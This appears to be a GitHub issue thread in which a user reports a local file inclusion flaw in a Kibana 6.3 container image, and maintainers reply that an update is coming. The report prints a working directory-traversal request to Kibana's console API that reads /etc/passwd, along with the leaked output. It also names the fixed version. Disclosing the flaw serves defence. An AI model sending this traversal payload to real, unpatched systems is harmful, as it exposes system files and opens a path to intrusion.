aav66
commented
4 years ago Hello!
Thank you for interest in our solution and for this vulnerability report. Our solution will be updated soon.
Closed kimattree closed 4 years ago
aav66
commented
4 years ago Hello!
Thank you for interest in our solution and for this vulnerability report. Our solution will be updated soon.
Category:
Container images
Type:
Bug
The current version of google/elastic-gke-logging/kibana:6.3 has an LFI vulnerability allowing directory traversal attacks on underlying infrastructure, this can also lead to remote shell exploitation as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
Using the current kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod:
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse (/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"} Debug: internal, implementation, error SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
the fix for this is in Elastic and Kibana versions 6.4.3.